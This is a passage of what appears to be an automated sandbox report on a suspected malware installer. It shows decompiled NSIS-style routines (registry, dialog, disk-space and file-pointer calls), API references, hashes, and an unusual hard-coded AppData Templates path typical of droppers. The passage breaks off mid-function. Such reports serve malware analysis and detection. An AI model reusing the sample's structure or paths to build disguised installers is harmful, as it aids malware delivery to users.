                                                                                                                        • Instruction ID: 06c3bf5761181e32eeb64575190c8f705bc4d95d62f31e0a95ca5cee6e166148
                                                                                                                        • Opcode Fuzzy Hash: 1738d012920e6012ec86f9ca786a62c21b23a44557d72f2be3407a63ad40e95f
                                                                                                                        • Instruction Fuzzy Hash: 19F0A5B2520280DEC370CF2A8CC4B0B3FE0B709315B24452AE18CD7262EB745646CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                        				void* _t7;
                                                                                                                        				long _t8;
                                                                                                                        				void* _t9;
                                                                                                                        
                                                                                                                        				_t7 = E00406329(_a4,  &_a12);
                                                                                                                        				if(_t7 != 0) {
                                                                                                                        					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                        					return _t8;
                                                                                                                        				}
                                                                                                                        				_t9 = 6;
                                                                                                                        				return _t9;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                        • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                        • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                        • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004015A3() {
                                                                                                                        				int _t5;
                                                                                                                        				void* _t11;
                                                                                                                        				int _t14;
                                                                                                                        
                                                                                                                        				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                                                        				_t14 = _t5;
                                                                                                                        				if(_t14 == 0) {
                                                                                                                        					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004044E5(int _a4) {
                                                                                                                        				struct HWND__* _t2;
                                                                                                                        				long _t3;
                                                                                                                        
                                                                                                                        				_t2 =  *0x433ed8; // 0x10418
                                                                                                                        				if(_t2 != 0) {
                                                                                                                        					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                                                        					return _t3;
                                                                                                                        				}
                                                                                                                        				return _t2;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00010418,00000000,00000000,00000000), ref: 004044F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004044CE(int _a4) {
                                                                                                                        				long _t2;
                                                                                                                        
                                                                                                                        				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                                                                        				return _t2;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004034E5(long _a4) {
                                                                                                                        				long _t2;
                                                                                                                        
                                                                                                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                        				return _t2;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004044BB(int _a4) {
                                                                                                                        				int _t2;
                                                                                                                        
                                                                                                                        				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                                                                                        				return _t2;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2492992576-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004014D7(intOrPtr __edx) {
                                                                                                                        				long _t3;
                                                                                                                        				void* _t7;
                                                                                                                        				intOrPtr _t10;
                                                                                                                        				void* _t13;
                                                                                                                        
                                                                                                                        				_t10 = __edx;
                                                                                                                        				_t3 = E00402D84(_t7);
                                                                                                                        				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                                                                        				if(_t3 <= 1) {
                                                                                                                        					_t3 = 1;
                                                                                                                        				}
                                                                                                                        				Sleep(_t3); // executed
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                                                        • Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
                                                                                                                        • Opcode Fuzzy Hash: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                                                        • Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 78%
                                                                                                                        			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				long _v16;
                                                                                                                        				long _v20;
                                                                                                                        				long _v24;
                                                                                                                        				char _v28;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				long _v36;
                                                                                                                        				char _v40;
                                                                                                                        				unsigned int _v44;
                                                                                                                        				signed int _v48;
                                                                                                                        				WCHAR* _v56;
                                                                                                                        				intOrPtr _v60;
                                                                                                                        				intOrPtr _v64;
                                                                                                                        				intOrPtr _v68;
                                                                                                                        				WCHAR* _v72;
                                                                                                                        				void _v76;
                                                                                                                        				struct HWND__* _v80;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr _t82;
                                                                                                                        				long _t87;
                                                                                                                        				short* _t89;
                                                                                                                        				void* _t95;
                                                                                                                        				signed int _t96;
                                                                                                                        				int _t109;
                                                                                                                        				signed short _t114;
                                                                                                                        				signed int _t118;
                                                                                                                        				struct HWND__** _t122;
                                                                                                                        				intOrPtr* _t138;
                                                                                                                        				WCHAR* _t146;
                                                                                                                        				intOrPtr _t147;
                                                                                                                        				unsigned int _t150;
                                                                                                                        				signed int _t152;
                                                                                                                        				unsigned int _t156;
                                                                                                                        				signed int _t158;
                                                                                                                        				signed int* _t159;
                                                                                                                        				signed int* _t160;
                                                                                                                        				struct HWND__* _t166;
                                                                                                                        				struct HWND__* _t167;
                                                                                                                        				int _t169;
                                                                                                                        				unsigned int _t197;
                                                                                                                        
                                                                                                                        				_t156 = __edx;
                                                                                                                        				_t82 =  *0x42c240; // 0x6bdacc
                                                                                                                        				_v32 = _t82;
                                                                                                                        				_t2 = _t82 + 0x3c; // 0x0
                                                                                                                        				_t3 = _t82 + 0x38; // 0x0
                                                                                                                        				_t146 = ( *_t2 << 0xb) + 0x436000;
                                                                                                                        				_v12 =  *_t3;
                                                                                                                        				if(_a8 == 0x40b) {
                                                                                                                        					E00405B81(0x3fb, _t146);
                                                                                                                        					E004067C4(_t146);
                                                                                                                        				}
                                                                                                                        				_t167 = _a4;
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					L8:
                                                                                                                        					if(_a8 != 0x111) {
                                                                                                                        						L20:
                                                                                                                        						if(_a8 == 0x40f) {
                                                                                                                        							L22:
                                                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                        							E00405B81(0x3fb, _t146);
                                                                                                                        							if(E00405F14(_t186, _t146) == 0) {
                                                                                                                        								_v8 = 1;
                                                                                                                        							}
                                                                                                                        							E0040653D(0x42b238, _t146);
                                                                                                                        							_t87 = E0040690A(1);
                                                                                                                        							_v16 = _t87;
                                                                                                                        							if(_t87 == 0) {
                                                                                                                        								L30:
                                                                                                                        								E0040653D(0x42b238, _t146);
                                                                                                                        								_t89 = E00405EB7(0x42b238);
                                                                                                                        								_t158 = 0;
                                                                                                                        								if(_t89 != 0) {
                                                                                                                        									 *_t89 = 0;
                                                                                                                        								}
                                                                                                                        								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                        									goto L35;
                                                                                                                        								} else {
                                                                                                                        									_t169 = 0x400;
                                                                                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                        									asm("cdq");
                                                                                                                        									_v48 = _t109;
                                                                                                                        									_v44 = _t156;
                                                                                                                        									_v12 = 1;
                                                                                                                        									goto L36;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								_t159 = 0;
                                                                                                                        								if(0 == 0x42b238) {
                                                                                                                        									goto L30;
                                                                                                                        								} else {
                                                                                                                        									goto L26;
                                                                                                                        								}
                                                                                                                        								while(1) {
                                                                                                                        									L26:
                                                                                                                        									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                                                                        									if(_t114 != 0) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									if(_t159 != 0) {
                                                                                                                        										 *_t159 =  *_t159 & _t114;
                                                                                                                        									}
                                                                                                                        									_t160 = E00405E58(0x42b238);
                                                                                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                        									_t159 = _t160;
                                                                                                                        									 *_t159 = 0x5c;
                                                                                                                        									if(_t159 != 0x42b238) {
                                                                                                                        										continue;
                                                                                                                        									} else {
                                                                                                                        										goto L30;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t150 = _v44;
                                                                                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                        								_v44 = _t150 >> 0xa;
                                                                                                                        								_v12 = 1;
                                                                                                                        								_t158 = 0;
                                                                                                                        								__eflags = 0;
                                                                                                                        								L35:
                                                                                                                        								_t169 = 0x400;
                                                                                                                        								L36:
                                                                                                                        								_t95 = E00404E27(5);
                                                                                                                        								if(_v12 != _t158) {
                                                                                                                        									_t197 = _v44;
                                                                                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                        										_v8 = 2;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t147 =  *0x433edc; // 0x6c3640
                                                                                                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                        									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                                                                        									if(_v12 == _t158) {
                                                                                                                        										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                                                                        									} else {
                                                                                                                        										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t96 = _v8;
                                                                                                                        								 *0x434fa4 = _t96;
                                                                                                                        								if(_t96 == _t158) {
                                                                                                                        									_v8 = E0040140B(7);
                                                                                                                        								}
                                                                                                                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                                                        									_v8 = _t158;
                                                                                                                        								}
                                                                                                                        								E004044BB(0 | _v8 == _t158);
                                                                                                                        								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                                                                        									E004048E3();
                                                                                                                        								}
                                                                                                                        								 *0x42d258 = _t158;
                                                                                                                        								goto L53;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t186 = _a8 - 0x405;
                                                                                                                        						if(_a8 != 0x405) {
                                                                                                                        							goto L53;
                                                                                                                        						}
                                                                                                                        						goto L22;
                                                                                                                        					}
                                                                                                                        					_t118 = _a12 & 0x0000ffff;
                                                                                                                        					if(_t118 != 0x3fb) {
                                                                                                                        						L12:
                                                                                                                        						if(_t118 == 0x3e9) {
                                                                                                                        							_t152 = 7;
                                                                                                                        							memset( &_v76, 0, _t152 << 2);
                                                                                                                        							_v80 = _t167;
                                                                                                                        							_v72 = 0x42d268;
                                                                                                                        							_v60 = E00404CE0;
                                                                                                                        							_v56 = _t146;
                                                                                                                        							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                                                                        							_t122 =  &_v80;
                                                                                                                        							_v64 = 0x41;
                                                                                                                        							__imp__SHBrowseForFolderW(_t122);
                                                                                                                        							if(_t122 == 0) {
                                                                                                                        								_a8 = 0x40f;
                                                                                                                        							} else {
                                                                                                                        								__imp__CoTaskMemFree(_t122);
                                                                                                                        								E00405E0C(_t146);
                                                                                                                        								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                                                                        								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne") {
                                                                                                                        									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                                                                        									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                                                                        										lstrcatW(_t146, 0x432ea0);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								 *0x42d258 =  *0x42d258 + 1;
                                                                                                                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L20;
                                                                                                                        					}
                                                                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                                                                        						goto L53;
                                                                                                                        					}
                                                                                                                        					_a8 = 0x40f;
                                                                                                                        					goto L12;
                                                                                                                        				} else {
                                                                                                                        					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                                        					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                                                                        						E00405E0C(_t146);
                                                                                                                        					}
                                                                                                                        					 *0x433ed8 = _t167;
                                                                                                                        					SetWindowTextW(_t166, _t146);
                                                                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                        					_push(1);
                                                                                                                        					E00404499(_t167);
                                                                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                        					_push(0x14);
                                                                                                                        					E00404499(_t167);
                                                                                                                        					E004044CE(_t166);
                                                                                                                        					_t138 = E0040690A(8);
                                                                                                                        					if(_t138 == 0) {
                                                                                                                        						L53:
                                                                                                                        						return E00404500(_a8, _a12, _a16);
                                                                                                                        					} else {
                                                                                                                        						 *_t138(_t166, 1);
                                                                                                                        						goto L8;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                        • SetWindowTextW.USER32(00000000,-00436000), ref: 00404A03
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                        • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
                                                                                                                        • lstrcatW.KERNEL32(-00436000,Call), ref: 00404AFD
                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 00404B0F
                                                                                                                          • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                          • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                          • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                          • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                          • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                          • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                                                                                          • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                          • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: @6l$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne$Call
                                                                                                                        • API String ID: 2624150263-3408421545
                                                                                                                        • Opcode ID: a166dbd395641350e1cfd01e9a5963c0b70786fd40c7a63bf9b40c361ea88958
                                                                                                                        • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                        • Opcode Fuzzy Hash: a166dbd395641350e1cfd01e9a5963c0b70786fd40c7a63bf9b40c361ea88958
                                                                                                                        • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E70B21BFF() {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				signed int _v20;
                                                                                                                        				WCHAR* _v24;
                                                                                                                        				WCHAR* _v28;
                                                                                                                        				signed int _v32;
                                                                                                                        				signed int _v36;
                                                                                                                        				signed int _v40;
                                                                                                                        				signed int _v44;
                                                                                                                        				WCHAR* _v48;
                                                                                                                        				signed int _v52;
                                                                                                                        				void* _v56;
                                                                                                                        				intOrPtr _v60;
                                                                                                                        				WCHAR* _t209;
                                                                                                                        				signed int _t212;
                                                                                                                        				void* _t214;
                                                                                                                        				void* _t216;
                                                                                                                        				WCHAR* _t218;
                                                                                                                        				void* _t226;
                                                                                                                        				struct HINSTANCE__* _t227;
                                                                                                                        				struct HINSTANCE__* _t228;
                                                                                                                        				struct HINSTANCE__* _t230;
                                                                                                                        				signed short _t232;
                                                                                                                        				struct HINSTANCE__* _t235;
                                                                                                                        				struct HINSTANCE__* _t237;
                                                                                                                        				void* _t238;
                                                                                                                        				intOrPtr* _t239;
                                                                                                                        				void* _t250;
                                                                                                                        				signed char _t251;
                                                                                                                        				signed int _t252;
                                                                                                                        				struct HINSTANCE__* _t258;
                                                                                                                        				void* _t259;
                                                                                                                        				signed int _t261;
                                                                                                                        				signed int _t262;
                                                                                                                        				signed short* _t265;
                                                                                                                        				signed int _t270;
                                                                                                                        				signed int _t273;
                                                                                                                        				signed int _t275;
                                                                                                                        				void* _t278;
                                                                                                                        				void* _t282;
                                                                                                                        				struct HINSTANCE__* _t284;
                                                                                                                        				signed int _t287;
                                                                                                                        				void _t288;
                                                                                                                        				signed int _t289;
                                                                                                                        				signed int _t301;
                                                                                                                        				signed int _t302;
                                                                                                                        				signed short _t305;
                                                                                                                        				void* _t306;
                                                                                                                        				signed int _t310;
                                                                                                                        				signed int _t313;
                                                                                                                        				signed int _t316;
                                                                                                                        				signed int _t317;
                                                                                                                        				signed int _t318;
                                                                                                                        				signed short* _t322;
                                                                                                                        				WCHAR* _t323;
                                                                                                                        				WCHAR* _t325;
                                                                                                                        				WCHAR* _t326;
                                                                                                                        				struct HINSTANCE__* _t327;
                                                                                                                        				void* _t329;
                                                                                                                        				signed int _t332;
                                                                                                                        				void* _t333;
                                                                                                                        
                                                                                                                        				_t284 = 0;
                                                                                                                        				_v32 = 0;
                                                                                                                        				_v36 = 0;
                                                                                                                        				_v16 = 0;
                                                                                                                        				_v8 = 0;
                                                                                                                        				_v40 = 0;
                                                                                                                        				_t333 = 0;
                                                                                                                        				_v52 = 0;
                                                                                                                        				_v44 = 0;
                                                                                                                        				_t209 = E70B212BB();
                                                                                                                        				_v24 = _t209;
                                                                                                                        				_v28 = _t209;
                                                                                                                        				_v48 = E70B212BB();
                                                                                                                        				_t322 = E70B212E3();
                                                                                                                        				_v56 = _t322;
                                                                                                                        				_v12 = _t322;
                                                                                                                        				while(1) {
                                                                                                                        					_t212 = _v32;
                                                                                                                        					_v60 = _t212;
                                                                                                                        					if(_t212 != _t284 && _t333 == _t284) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t287 =  *_t322 & 0x0000ffff;
                                                                                                                        					_t214 = _t287 - _t284;
                                                                                                                        					if(_t214 == 0) {
                                                                                                                        						_t37 =  &_v32;
                                                                                                                        						 *_t37 = _v32 | 0xffffffff;
                                                                                                                        						__eflags =  *_t37;
                                                                                                                        						L20:
                                                                                                                        						_t216 = _v60 - _t284;
                                                                                                                        						if(_t216 == 0) {
                                                                                                                        							__eflags = _t333 - _t284;
                                                                                                                        							 *_v28 = _t284;
                                                                                                                        							if(_t333 == _t284) {
                                                                                                                        								_t333 = GlobalAlloc(0x40, 0x1ca4);
                                                                                                                        								 *(_t333 + 0x1010) = _t284;
                                                                                                                        								 *(_t333 + 0x1014) = _t284;
                                                                                                                        							}
                                                                                                                        							_t288 = _v36;
                                                                                                                        							_t47 = _t333 + 8; // 0x8
                                                                                                                        							_t218 = _t47;
                                                                                                                        							_t48 = _t333 + 0x808; // 0x808
                                                                                                                        							_t323 = _t48;
                                                                                                                        							 *_t333 = _t288;
                                                                                                                        							_t289 = _t288 - _t284;
                                                                                                                        							__eflags = _t289;
                                                                                                                        							 *_t218 = _t284;
                                                                                                                        							 *_t323 = _t284;
                                                                                                                        							 *(_t333 + 0x1008) = _t284;
                                                                                                                        							 *(_t333 + 0x100c) = _t284;
                                                                                                                        							 *(_t333 + 4) = _t284;
                                                                                                                        							if(_t289 == 0) {
                                                                                                                        								__eflags = _v28 - _v24;
                                                                                                                        								if(_v28 == _v24) {
                                                                                                                        									goto L42;
                                                                                                                        								}
                                                                                                                        								_t329 = 0;
                                                                                                                        								GlobalFree(_t333);
                                                                                                                        								_t333 = E70B213B1(_v24);
                                                                                                                        								__eflags = _t333 - _t284;
                                                                                                                        								if(_t333 == _t284) {
                                                                                                                        									goto L42;
                                                                                                                        								} else {
                                                                                                                        									goto L35;
                                                                                                                        								}
                                                                                                                        								while(1) {
                                                                                                                        									L35:
                                                                                                                        									_t250 =  *(_t333 + 0x1ca0);
                                                                                                                        									__eflags = _t250 - _t284;
